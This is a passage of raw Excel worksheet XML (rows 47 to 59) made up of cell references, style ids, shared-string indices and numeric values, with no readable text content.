        <v>399</v>
      </c>
      <c r="F47" s="55" t="s">
        <v>400</v>
      </c>
      <c r="G47" s="45" t="s">
        <v>401</v>
      </c>
      <c r="H47" s="46" t="s">
        <v>429</v>
      </c>
      <c r="I47" s="46" t="s">
        <v>147</v>
      </c>
      <c r="J47" s="46" t="s">
        <v>430</v>
      </c>
      <c r="K47" s="47">
        <v>1.0</v>
      </c>
      <c r="L47" s="47">
        <v>0.0</v>
      </c>
      <c r="M47" s="48" t="s">
        <v>10</v>
      </c>
      <c r="N47" s="48" t="s">
        <v>10</v>
      </c>
      <c r="O47" s="48" t="s">
        <v>10</v>
      </c>
      <c r="P47" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Q47" s="50">
        <v>2100366.0</v>
      </c>
      <c r="R47" s="50">
        <v>1.0</v>
      </c>
      <c r="S47" s="50">
        <v>10.0</v>
      </c>
      <c r="T47" s="49">
        <v>2100366.0</v>
      </c>
      <c r="U47" s="51">
        <v>2100366.0</v>
      </c>
      <c r="V47" s="51">
        <v>1.0</v>
      </c>
      <c r="W47" s="51">
        <v>10.0</v>
      </c>
      <c r="X47" s="49">
        <v>2100366.0</v>
      </c>
      <c r="Y47" s="52" t="s">
        <v>416</v>
      </c>
      <c r="Z47" s="52">
        <v>6.0</v>
      </c>
      <c r="AA47" s="52">
        <v>30.0</v>
      </c>
      <c r="AB47" s="49" t="s">
        <v>417</v>
      </c>
      <c r="AC47" s="64" t="s">
        <v>59</v>
      </c>
      <c r="AD47" s="65" t="s">
        <v>418</v>
      </c>
      <c r="AE47" s="65" t="s">
        <v>10</v>
      </c>
      <c r="AF47" s="53" t="s">
        <v>431</v>
      </c>
      <c r="AG47" s="65" t="s">
        <v>432</v>
      </c>
      <c r="AH47" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AI47" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AJ47" s="47" t="s">
        <v>64</v>
      </c>
      <c r="AK47" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AL47" s="66" t="s">
        <v>64</v>
      </c>
    </row>
    <row r="48" ht="153.75" customHeight="1">
      <c r="B48" s="44" t="s">
        <v>330</v>
      </c>
      <c r="C48" s="45" t="s">
        <v>397</v>
      </c>
      <c r="D48" s="45" t="s">
        <v>398</v>
      </c>
      <c r="E48" s="45" t="s">
        <v>399</v>
      </c>
      <c r="F48" s="55" t="s">
        <v>10</v>
      </c>
      <c r="G48" s="45" t="s">
        <v>10</v>
      </c>
      <c r="H48" s="46" t="s">
        <v>433</v>
      </c>
      <c r="I48" s="46" t="s">
        <v>434</v>
      </c>
      <c r="J48" s="46" t="s">
        <v>435</v>
      </c>
      <c r="K48" s="47">
        <v>1.0</v>
      </c>
      <c r="L48" s="47">
        <v>0.0</v>
      </c>
      <c r="M48" s="48" t="s">
        <v>10</v>
      </c>
      <c r="N48" s="48" t="s">
        <v>10</v>
      </c>
      <c r="O48" s="48" t="s">
        <v>10</v>
      </c>
      <c r="P48" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Q48" s="50">
        <v>2100366.0</v>
      </c>
      <c r="R48" s="50">
        <v>1.0</v>
      </c>
      <c r="S48" s="50">
        <v>14.0</v>
      </c>
      <c r="T48" s="49">
        <v>2100366.0</v>
      </c>
      <c r="U48" s="51">
        <v>2100366.0</v>
      </c>
      <c r="V48" s="51">
        <v>1.0</v>
      </c>
      <c r="W48" s="51">
        <v>14.0</v>
      </c>
      <c r="X48" s="49">
        <v>2100366.0</v>
      </c>
      <c r="Y48" s="52" t="s">
        <v>436</v>
      </c>
      <c r="Z48" s="52">
        <v>5.0</v>
      </c>
      <c r="AA48" s="52">
        <v>46.0</v>
      </c>
      <c r="AB48" s="49" t="s">
        <v>437</v>
      </c>
      <c r="AC48" s="64" t="s">
        <v>212</v>
      </c>
      <c r="AD48" s="65" t="s">
        <v>438</v>
      </c>
      <c r="AE48" s="65" t="s">
        <v>439</v>
      </c>
      <c r="AF48" s="53" t="s">
        <v>440</v>
      </c>
      <c r="AG48" s="65" t="s">
        <v>441</v>
      </c>
      <c r="AH48" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AI48" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AJ48" s="47" t="s">
        <v>64</v>
      </c>
      <c r="AK48" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AL48" s="66" t="s">
        <v>64</v>
      </c>
    </row>
    <row r="49" ht="153.75" customHeight="1">
      <c r="B49" s="44" t="s">
        <v>330</v>
      </c>
      <c r="C49" s="45" t="s">
        <v>397</v>
      </c>
      <c r="D49" s="45" t="s">
        <v>398</v>
      </c>
      <c r="E49" s="45" t="s">
        <v>399</v>
      </c>
      <c r="F49" s="55" t="s">
        <v>10</v>
      </c>
      <c r="G49" s="45" t="s">
        <v>10</v>
      </c>
      <c r="H49" s="46" t="s">
        <v>442</v>
      </c>
      <c r="I49" s="46" t="s">
        <v>443</v>
      </c>
      <c r="J49" s="46" t="s">
        <v>444</v>
      </c>
      <c r="K49" s="47">
        <v>1.0</v>
      </c>
      <c r="L49" s="47">
        <v>0.0</v>
      </c>
      <c r="M49" s="48" t="s">
        <v>10</v>
      </c>
      <c r="N49" s="48" t="s">
        <v>10</v>
      </c>
      <c r="O49" s="48" t="s">
        <v>10</v>
      </c>
      <c r="P49" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Q49" s="50">
        <v>2100366.0</v>
      </c>
      <c r="R49" s="50">
        <v>1.0</v>
      </c>
      <c r="S49" s="50">
        <v>30.0</v>
      </c>
      <c r="T49" s="49">
        <v>2100366.0</v>
      </c>
      <c r="U49" s="51">
        <v>2100366.0</v>
      </c>
      <c r="V49" s="51">
        <v>1.0</v>
      </c>
      <c r="W49" s="51">
        <v>30.0</v>
      </c>
      <c r="X49" s="49">
        <v>2100366.0</v>
      </c>
      <c r="Y49" s="52" t="s">
        <v>445</v>
      </c>
      <c r="Z49" s="52">
        <v>7.0</v>
      </c>
      <c r="AA49" s="52">
        <v>96.0</v>
      </c>
      <c r="AB49" s="49" t="s">
        <v>446</v>
      </c>
      <c r="AC49" s="64" t="s">
        <v>212</v>
      </c>
      <c r="AD49" s="65" t="s">
        <v>447</v>
      </c>
      <c r="AE49" s="65" t="s">
        <v>10</v>
      </c>
      <c r="AF49" s="53" t="s">
        <v>448</v>
      </c>
      <c r="AG49" s="65" t="s">
        <v>449</v>
      </c>
      <c r="AH49" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AI49" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AJ49" s="47" t="s">
        <v>64</v>
      </c>
      <c r="AK49" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AL49" s="66" t="s">
        <v>64</v>
      </c>
    </row>
    <row r="50" ht="153.75" customHeight="1">
      <c r="B50" s="44" t="s">
        <v>330</v>
      </c>
      <c r="C50" s="45" t="s">
        <v>10</v>
      </c>
      <c r="D50" s="45" t="s">
        <v>450</v>
      </c>
      <c r="E50" s="45" t="s">
        <v>451</v>
      </c>
      <c r="F50" s="55" t="s">
        <v>10</v>
      </c>
      <c r="G50" s="45" t="s">
        <v>10</v>
      </c>
      <c r="H50" s="46" t="s">
        <v>452</v>
      </c>
      <c r="I50" s="46" t="s">
        <v>453</v>
      </c>
      <c r="J50" s="46" t="s">
        <v>454</v>
      </c>
      <c r="K50" s="47">
        <v>1.0</v>
      </c>
      <c r="L50" s="47">
        <v>0.0</v>
      </c>
      <c r="M50" s="48" t="s">
        <v>10</v>
      </c>
      <c r="N50" s="48" t="s">
        <v>10</v>
      </c>
      <c r="O50" s="48" t="s">
        <v>10</v>
      </c>
      <c r="P50" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Q50" s="50" t="s">
        <v>10</v>
      </c>
      <c r="R50" s="50" t="s">
        <v>10</v>
      </c>
      <c r="S50" s="50"/>
      <c r="T50" s="49" t="s">
        <v>10</v>
      </c>
      <c r="U50" s="60" t="s">
        <v>455</v>
      </c>
      <c r="V50" s="51">
        <v>3.0</v>
      </c>
      <c r="W50" s="51">
        <v>6.0</v>
      </c>
      <c r="X50" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Y50" s="52" t="s">
        <v>456</v>
      </c>
      <c r="Z50" s="52">
        <v>5.0</v>
      </c>
      <c r="AA50" s="52"/>
      <c r="AB50" s="49">
        <v>2002752.2002749</v>
      </c>
      <c r="AC50" s="64" t="s">
        <v>59</v>
      </c>
      <c r="AD50" s="65" t="s">
        <v>457</v>
      </c>
      <c r="AE50" s="65" t="s">
        <v>458</v>
      </c>
      <c r="AF50" s="53" t="s">
        <v>459</v>
      </c>
      <c r="AG50" s="46" t="s">
        <v>108</v>
      </c>
      <c r="AH50" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AI50" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AJ50" s="47" t="s">
        <v>64</v>
      </c>
      <c r="AK50" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AL50" s="66" t="s">
        <v>64</v>
      </c>
    </row>
    <row r="51" ht="153.75" customHeight="1">
      <c r="B51" s="74" t="s">
        <v>330</v>
      </c>
      <c r="C51" s="75" t="s">
        <v>10</v>
      </c>
      <c r="D51" s="75" t="s">
        <v>460</v>
      </c>
      <c r="E51" s="75" t="s">
        <v>461</v>
      </c>
      <c r="F51" s="76" t="s">
        <v>462</v>
      </c>
      <c r="G51" s="75" t="s">
        <v>463</v>
      </c>
      <c r="H51" s="77" t="s">
        <v>464</v>
      </c>
      <c r="I51" s="77" t="s">
        <v>465</v>
      </c>
      <c r="J51" s="77" t="s">
        <v>466</v>
      </c>
      <c r="K51" s="47">
        <v>1.0</v>
      </c>
      <c r="L51" s="47">
        <v>0.0</v>
      </c>
      <c r="M51" s="78" t="s">
        <v>10</v>
      </c>
      <c r="N51" s="78" t="s">
        <v>10</v>
      </c>
      <c r="O51" s="78" t="s">
        <v>10</v>
      </c>
      <c r="P51" s="79" t="s">
        <v>10</v>
      </c>
      <c r="Q51" s="80" t="s">
        <v>10</v>
      </c>
      <c r="R51" s="80" t="s">
        <v>10</v>
      </c>
      <c r="S51" s="80" t="s">
        <v>10</v>
      </c>
      <c r="T51" s="79" t="s">
        <v>10</v>
      </c>
      <c r="U51" s="81" t="s">
        <v>10</v>
      </c>
      <c r="V51" s="81" t="s">
        <v>10</v>
      </c>
      <c r="W51" s="81" t="s">
        <v>10</v>
      </c>
      <c r="X51" s="79" t="s">
        <v>10</v>
      </c>
      <c r="Y51" s="82" t="s">
        <v>82</v>
      </c>
      <c r="Z51" s="82">
        <v>2.0</v>
      </c>
      <c r="AA51" s="82">
        <v>2.0</v>
      </c>
      <c r="AB51" s="79" t="s">
        <v>82</v>
      </c>
      <c r="AC51" s="83" t="s">
        <v>59</v>
      </c>
      <c r="AD51" s="84" t="s">
        <v>467</v>
      </c>
      <c r="AE51" s="84" t="s">
        <v>10</v>
      </c>
      <c r="AF51" s="53" t="s">
        <v>468</v>
      </c>
      <c r="AG51" s="65" t="s">
        <v>469</v>
      </c>
      <c r="AH51" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AI51" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AJ51" s="47" t="s">
        <v>64</v>
      </c>
      <c r="AK51" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AL51" s="85" t="s">
        <v>64</v>
      </c>
    </row>
    <row r="52" ht="153.75" customHeight="1">
      <c r="B52" s="86" t="s">
        <v>397</v>
      </c>
      <c r="C52" s="87" t="s">
        <v>10</v>
      </c>
      <c r="D52" s="87" t="s">
        <v>470</v>
      </c>
      <c r="E52" s="87" t="s">
        <v>471</v>
      </c>
      <c r="F52" s="88" t="s">
        <v>472</v>
      </c>
      <c r="G52" s="87" t="s">
        <v>473</v>
      </c>
      <c r="H52" s="89" t="s">
        <v>474</v>
      </c>
      <c r="I52" s="89" t="s">
        <v>323</v>
      </c>
      <c r="J52" s="89" t="s">
        <v>475</v>
      </c>
      <c r="K52" s="47">
        <v>1.0</v>
      </c>
      <c r="L52" s="47">
        <v>0.0</v>
      </c>
      <c r="M52" s="90" t="s">
        <v>476</v>
      </c>
      <c r="N52" s="91">
        <v>2.0</v>
      </c>
      <c r="O52" s="91">
        <v>792.0</v>
      </c>
      <c r="P52" s="92" t="s">
        <v>10</v>
      </c>
      <c r="Q52" s="93" t="s">
        <v>477</v>
      </c>
      <c r="R52" s="94">
        <v>3.0</v>
      </c>
      <c r="S52" s="94">
        <v>1188.0</v>
      </c>
      <c r="T52" s="92">
        <v>2101411.0</v>
      </c>
      <c r="U52" s="95" t="s">
        <v>477</v>
      </c>
      <c r="V52" s="96">
        <v>3.0</v>
      </c>
      <c r="W52" s="96">
        <v>1980.0</v>
      </c>
      <c r="X52" s="92">
        <v>2101411.0</v>
      </c>
      <c r="Y52" s="97" t="s">
        <v>478</v>
      </c>
      <c r="Z52" s="97">
        <v>6.0</v>
      </c>
      <c r="AA52" s="97">
        <v>2380.0</v>
      </c>
      <c r="AB52" s="92" t="s">
        <v>479</v>
      </c>
      <c r="AC52" s="98" t="s">
        <v>59</v>
      </c>
      <c r="AD52" s="99" t="s">
        <v>480</v>
      </c>
      <c r="AE52" s="99" t="s">
        <v>481</v>
      </c>
      <c r="AF52" s="53" t="s">
        <v>482</v>
      </c>
      <c r="AG52" s="46" t="s">
        <v>75</v>
      </c>
      <c r="AH52" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AI52" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AJ52" s="47" t="s">
        <v>64</v>
      </c>
      <c r="AK52" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AL52" s="100" t="s">
        <v>64</v>
      </c>
    </row>
    <row r="53" ht="153.75" customHeight="1">
      <c r="B53" s="44" t="s">
        <v>397</v>
      </c>
      <c r="C53" s="45" t="s">
        <v>10</v>
      </c>
      <c r="D53" s="45" t="s">
        <v>483</v>
      </c>
      <c r="E53" s="45" t="s">
        <v>484</v>
      </c>
      <c r="F53" s="45" t="s">
        <v>10</v>
      </c>
      <c r="G53" s="45" t="s">
        <v>10</v>
      </c>
      <c r="H53" s="46" t="s">
        <v>188</v>
      </c>
      <c r="I53" s="46" t="s">
        <v>189</v>
      </c>
      <c r="J53" s="46" t="s">
        <v>485</v>
      </c>
      <c r="K53" s="47">
        <v>1.0</v>
      </c>
      <c r="L53" s="47">
        <v>0.0</v>
      </c>
      <c r="M53" s="48" t="s">
        <v>10</v>
      </c>
      <c r="N53" s="48" t="s">
        <v>10</v>
      </c>
      <c r="O53" s="48" t="s">
        <v>10</v>
      </c>
      <c r="P53" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Q53" s="50" t="s">
        <v>10</v>
      </c>
      <c r="R53" s="50" t="s">
        <v>10</v>
      </c>
      <c r="S53" s="50" t="s">
        <v>10</v>
      </c>
      <c r="T53" s="49" t="s">
        <v>10</v>
      </c>
      <c r="U53" s="51">
        <v>50447.0</v>
      </c>
      <c r="V53" s="51">
        <v>1.0</v>
      </c>
      <c r="W53" s="51">
        <v>3.0</v>
      </c>
      <c r="X53" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Y53" s="52" t="s">
        <v>191</v>
      </c>
      <c r="Z53" s="52">
        <v>3.0</v>
      </c>
      <c r="AA53" s="52">
        <v>7.0</v>
      </c>
      <c r="AB53" s="49" t="s">
        <v>82</v>
      </c>
      <c r="AC53" s="64" t="s">
        <v>64</v>
      </c>
      <c r="AD53" s="65" t="s">
        <v>10</v>
      </c>
      <c r="AE53" s="65" t="s">
        <v>486</v>
      </c>
      <c r="AF53" s="53" t="s">
        <v>487</v>
      </c>
      <c r="AG53" s="46" t="s">
        <v>488</v>
      </c>
      <c r="AH53" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AI53" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AJ53" s="47" t="s">
        <v>64</v>
      </c>
      <c r="AK53" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AL53" s="66" t="s">
        <v>64</v>
      </c>
    </row>
    <row r="54" ht="153.75" customHeight="1">
      <c r="B54" s="44" t="s">
        <v>397</v>
      </c>
      <c r="C54" s="45" t="s">
        <v>10</v>
      </c>
      <c r="D54" s="45" t="s">
        <v>489</v>
      </c>
      <c r="E54" s="45" t="s">
        <v>490</v>
      </c>
      <c r="F54" s="45" t="s">
        <v>10</v>
      </c>
      <c r="G54" s="45" t="s">
        <v>10</v>
      </c>
      <c r="H54" s="46" t="s">
        <v>491</v>
      </c>
      <c r="I54" s="46" t="s">
        <v>492</v>
      </c>
      <c r="J54" s="46" t="s">
        <v>493</v>
      </c>
      <c r="K54" s="47">
        <v>1.0</v>
      </c>
      <c r="L54" s="47">
        <v>0.0</v>
      </c>
      <c r="M54" s="48" t="s">
        <v>10</v>
      </c>
      <c r="N54" s="48" t="s">
        <v>10</v>
      </c>
      <c r="O54" s="48" t="s">
        <v>10</v>
      </c>
      <c r="P54" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Q54" s="50" t="s">
        <v>10</v>
      </c>
      <c r="R54" s="50" t="s">
        <v>10</v>
      </c>
      <c r="S54" s="50" t="s">
        <v>10</v>
      </c>
      <c r="T54" s="49" t="s">
        <v>10</v>
      </c>
      <c r="U54" s="60">
        <v>44489.0</v>
      </c>
      <c r="V54" s="51">
        <v>1.0</v>
      </c>
      <c r="W54" s="51">
        <v>1.0</v>
      </c>
      <c r="X54" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Y54" s="52" t="s">
        <v>494</v>
      </c>
      <c r="Z54" s="52">
        <v>5.0</v>
      </c>
      <c r="AA54" s="52">
        <v>5.0</v>
      </c>
      <c r="AB54" s="49" t="s">
        <v>82</v>
      </c>
      <c r="AC54" s="64" t="s">
        <v>64</v>
      </c>
      <c r="AD54" s="65" t="s">
        <v>495</v>
      </c>
      <c r="AE54" s="65" t="s">
        <v>10</v>
      </c>
      <c r="AF54" s="53" t="s">
        <v>496</v>
      </c>
      <c r="AG54" s="65" t="s">
        <v>497</v>
      </c>
      <c r="AH54" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AI54" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AJ54" s="47" t="s">
        <v>64</v>
      </c>
      <c r="AK54" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AL54" s="66" t="s">
        <v>64</v>
      </c>
    </row>
    <row r="55" ht="153.75" customHeight="1">
      <c r="B55" s="44" t="s">
        <v>397</v>
      </c>
      <c r="C55" s="45" t="s">
        <v>10</v>
      </c>
      <c r="D55" s="45" t="s">
        <v>498</v>
      </c>
      <c r="E55" s="45" t="s">
        <v>499</v>
      </c>
      <c r="F55" s="45" t="s">
        <v>500</v>
      </c>
      <c r="G55" s="45" t="s">
        <v>501</v>
      </c>
      <c r="H55" s="46" t="s">
        <v>502</v>
      </c>
      <c r="I55" s="46" t="s">
        <v>503</v>
      </c>
      <c r="J55" s="46" t="s">
        <v>504</v>
      </c>
      <c r="K55" s="47">
        <v>1.0</v>
      </c>
      <c r="L55" s="47">
        <v>0.0</v>
      </c>
      <c r="M55" s="48" t="s">
        <v>10</v>
      </c>
      <c r="N55" s="48" t="s">
        <v>10</v>
      </c>
      <c r="O55" s="48" t="s">
        <v>10</v>
      </c>
      <c r="P55" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Q55" s="50" t="s">
        <v>10</v>
      </c>
      <c r="R55" s="50" t="s">
        <v>10</v>
      </c>
      <c r="S55" s="50" t="s">
        <v>10</v>
      </c>
      <c r="T55" s="49" t="s">
        <v>10</v>
      </c>
      <c r="U55" s="51" t="s">
        <v>10</v>
      </c>
      <c r="V55" s="51" t="s">
        <v>10</v>
      </c>
      <c r="W55" s="51" t="s">
        <v>10</v>
      </c>
      <c r="X55" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Y55" s="52" t="s">
        <v>505</v>
      </c>
      <c r="Z55" s="52">
        <v>4.0</v>
      </c>
      <c r="AA55" s="52">
        <v>9.0</v>
      </c>
      <c r="AB55" s="49" t="s">
        <v>82</v>
      </c>
      <c r="AC55" s="64" t="s">
        <v>64</v>
      </c>
      <c r="AD55" s="65" t="s">
        <v>506</v>
      </c>
      <c r="AE55" s="65" t="s">
        <v>10</v>
      </c>
      <c r="AF55" s="53" t="s">
        <v>507</v>
      </c>
      <c r="AG55" s="65" t="s">
        <v>508</v>
      </c>
      <c r="AH55" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AI55" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AJ55" s="47" t="s">
        <v>64</v>
      </c>
      <c r="AK55" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AL55" s="66" t="s">
        <v>64</v>
      </c>
    </row>
    <row r="56" ht="153.75" customHeight="1">
      <c r="B56" s="44" t="s">
        <v>509</v>
      </c>
      <c r="C56" s="45" t="s">
        <v>10</v>
      </c>
      <c r="D56" s="45" t="s">
        <v>510</v>
      </c>
      <c r="E56" s="45" t="s">
        <v>511</v>
      </c>
      <c r="F56" s="45" t="s">
        <v>512</v>
      </c>
      <c r="G56" s="45" t="s">
        <v>513</v>
      </c>
      <c r="H56" s="46" t="s">
        <v>188</v>
      </c>
      <c r="I56" s="46" t="s">
        <v>189</v>
      </c>
      <c r="J56" s="46" t="s">
        <v>514</v>
      </c>
      <c r="K56" s="47">
        <v>1.0</v>
      </c>
      <c r="L56" s="47">
        <v>0.0</v>
      </c>
      <c r="M56" s="48" t="s">
        <v>10</v>
      </c>
      <c r="N56" s="48" t="s">
        <v>10</v>
      </c>
      <c r="O56" s="48" t="s">
        <v>10</v>
      </c>
      <c r="P56" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Q56" s="59">
        <v>2006443.0</v>
      </c>
      <c r="R56" s="50">
        <v>1.0</v>
      </c>
      <c r="S56" s="50">
        <v>1.0</v>
      </c>
      <c r="T56" s="49" t="s">
        <v>10</v>
      </c>
      <c r="U56" s="51" t="s">
        <v>515</v>
      </c>
      <c r="V56" s="51">
        <v>2.0</v>
      </c>
      <c r="W56" s="51">
        <v>2.0</v>
      </c>
      <c r="X56" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Y56" s="52" t="s">
        <v>516</v>
      </c>
      <c r="Z56" s="52">
        <v>4.0</v>
      </c>
      <c r="AA56" s="52">
        <v>6.0</v>
      </c>
      <c r="AB56" s="49" t="s">
        <v>82</v>
      </c>
      <c r="AC56" s="64" t="s">
        <v>181</v>
      </c>
      <c r="AD56" s="65" t="s">
        <v>517</v>
      </c>
      <c r="AE56" s="65" t="s">
        <v>518</v>
      </c>
      <c r="AF56" s="53" t="s">
        <v>519</v>
      </c>
      <c r="AG56" s="46" t="s">
        <v>520</v>
      </c>
      <c r="AH56" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AI56" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AJ56" s="47" t="s">
        <v>64</v>
      </c>
      <c r="AK56" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AL56" s="66" t="s">
        <v>64</v>
      </c>
    </row>
    <row r="57" ht="153.75" customHeight="1">
      <c r="B57" s="44" t="s">
        <v>509</v>
      </c>
      <c r="C57" s="45" t="s">
        <v>10</v>
      </c>
      <c r="D57" s="45" t="s">
        <v>521</v>
      </c>
      <c r="E57" s="45" t="s">
        <v>522</v>
      </c>
      <c r="F57" s="55" t="s">
        <v>523</v>
      </c>
      <c r="G57" s="45" t="s">
        <v>524</v>
      </c>
      <c r="H57" s="46" t="s">
        <v>525</v>
      </c>
      <c r="I57" s="46" t="s">
        <v>323</v>
      </c>
      <c r="J57" s="46" t="s">
        <v>526</v>
      </c>
      <c r="K57" s="47">
        <v>1.0</v>
      </c>
      <c r="L57" s="47">
        <v>0.0</v>
      </c>
      <c r="M57" s="48">
        <v>40063.0</v>
      </c>
      <c r="N57" s="48">
        <v>1.0</v>
      </c>
      <c r="O57" s="48">
        <v>92.0</v>
      </c>
      <c r="P57" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Q57" s="50" t="s">
        <v>527</v>
      </c>
      <c r="R57" s="50">
        <v>2.0</v>
      </c>
      <c r="S57" s="50">
        <v>93.0</v>
      </c>
      <c r="T57" s="49" t="s">
        <v>10</v>
      </c>
      <c r="U57" s="51" t="s">
        <v>527</v>
      </c>
      <c r="V57" s="51">
        <v>2.0</v>
      </c>
      <c r="W57" s="51">
        <v>185.0</v>
      </c>
      <c r="X57" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Y57" s="52" t="s">
        <v>528</v>
      </c>
      <c r="Z57" s="52">
        <v>4.0</v>
      </c>
      <c r="AA57" s="52">
        <v>193.0</v>
      </c>
      <c r="AB57" s="49" t="s">
        <v>82</v>
      </c>
      <c r="AC57" s="64" t="s">
        <v>64</v>
      </c>
      <c r="AD57" s="65" t="s">
        <v>10</v>
      </c>
      <c r="AE57" s="65" t="s">
        <v>529</v>
      </c>
      <c r="AF57" s="53" t="s">
        <v>530</v>
      </c>
      <c r="AG57" s="46" t="s">
        <v>531</v>
      </c>
      <c r="AH57" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AI57" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AJ57" s="47" t="s">
        <v>64</v>
      </c>
      <c r="AK57" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AL57" s="66" t="s">
        <v>64</v>
      </c>
    </row>
    <row r="58" ht="163.5" customHeight="1">
      <c r="B58" s="44" t="s">
        <v>509</v>
      </c>
      <c r="C58" s="45" t="s">
        <v>10</v>
      </c>
      <c r="D58" s="45" t="s">
        <v>521</v>
      </c>
      <c r="E58" s="45" t="s">
        <v>522</v>
      </c>
      <c r="F58" s="55" t="s">
        <v>532</v>
      </c>
      <c r="G58" s="45" t="s">
        <v>533</v>
      </c>
      <c r="H58" s="46" t="s">
        <v>534</v>
      </c>
      <c r="I58" s="46" t="s">
        <v>535</v>
      </c>
      <c r="J58" s="46" t="s">
        <v>536</v>
      </c>
      <c r="K58" s="47">
        <v>1.0</v>
      </c>
      <c r="L58" s="47">
        <v>0.0</v>
      </c>
      <c r="M58" s="48" t="s">
        <v>10</v>
      </c>
      <c r="N58" s="48" t="s">
        <v>10</v>
      </c>
      <c r="O58" s="48" t="s">
        <v>10</v>
      </c>
      <c r="P58" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Q58" s="50">
        <v>2100366.0</v>
      </c>
      <c r="R58" s="50">
        <v>1.0</v>
      </c>
      <c r="S58" s="50">
        <v>42.0</v>
      </c>
      <c r="T58" s="49">
        <v>210366.0</v>
      </c>
      <c r="U58" s="51">
        <v>2100366.0</v>
      </c>
      <c r="V58" s="51">
        <v>1.0</v>
      </c>
      <c r="W58" s="51">
        <v>42.0</v>
      </c>
      <c r="X58" s="49">
        <v>2100366.0</v>
      </c>
      <c r="Y58" s="52" t="s">
        <v>537</v>
      </c>
      <c r="Z58" s="52">
        <v>6.0</v>
      </c>
      <c r="AA58" s="52">
        <v>125.0</v>
      </c>
      <c r="AB58" s="49" t="s">
        <v>538</v>
      </c>
      <c r="AC58" s="64" t="s">
        <v>59</v>
      </c>
      <c r="AD58" s="65" t="s">
        <v>418</v>
      </c>
      <c r="AE58" s="65" t="s">
        <v>10</v>
      </c>
      <c r="AF58" s="53" t="s">
        <v>539</v>
      </c>
      <c r="AG58" s="65" t="s">
        <v>540</v>
      </c>
      <c r="AH58" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AI58" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AJ58" s="47" t="s">
        <v>64</v>
      </c>
      <c r="AK58" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AL58" s="66" t="s">
        <v>64</v>
      </c>
    </row>
    <row r="59" ht="153.75" customHeight="1">
      <c r="B59" s="44" t="s">
        <v>509</v>
      </c>
      <c r="C59" s="45" t="s">
        <v>10</v>
      </c>
      <c r="D59" s="45" t="s">
        <v>521</v>
      </c>
      <c r="E59" s="45" t="s">
        <v>522</v>
      </c>
      <c r="F59" s="55" t="s">
        <v>541</v>
      </c>
      <c r="G59" s="45" t="s">
        <v>542</v>
      </c>
      <c r="H59" s="46" t="s">
        <v>543</v>
      </c>
      <c r="I59" s="46" t="s">
        <v>544</v>
      </c>
      <c r="J59" s="46" t="s">
        <v>545</v>
      </c>
      <c r="K59" s="47">
        <v>1.0</v>
      </c>
      <c r="L59" s="47">
        <v>0.0</v>
      </c>
      <c r="M59" s="48" t="s">
        <v>10</v>
      </c>
      <c r="N59" s="48" t="s">
        <v>10</v>
      </c>
      <c r="O59" s="48" t="s">
        <v>10</v>
      </c>
      <c r="P59" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Q59" s="50" t="s">
        <v>10</v>
      </c>
      <c r="R59" s="50" t="s">
        <v>10</v>
      </c>
      <c r="S59" s="50" t="s">
        <v>10</v>
      </c>
      <c r="T59" s="49" t="s">
        <v>10</v>
      </c>
      <c r="U59" s="51" t="s">
        <v>10</v>
      </c>
      <c r="V59" s="51" t="s">
        <v>10</v>
      </c>
      <c r="W59" s="51" t="s">
        <v>10</v>
      </c>
      <c r="X59" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Y59" s="52" t="s">
        <v>82</v>
      </c>
      <c r="Z59" s="52">
        <v>2.0</v>
      </c>
      <c r="AA59" s="52">
        <v>4.0</v>
      </c>
      <c r="AB59" s="49" t="s">
        <v>82</v>
      </c>
      <c r="AC59" s="64" t="s">
        <v>64</v>
      </c>
      <c r="AD59" s="65" t="s">
        <v>546</v>
      </c>
      <c r="AE59" s="65" t="s">
        <v>10</v>
      </c>
      <c r="AF59" s="53" t="s">
        <v>547</v>
      </c>
      <c r="AG59" s="65" t="s">
        <v>548</v>
      </c>
      <c r="AH59" s="47" t="s">
        <v>59</v>
      </c>
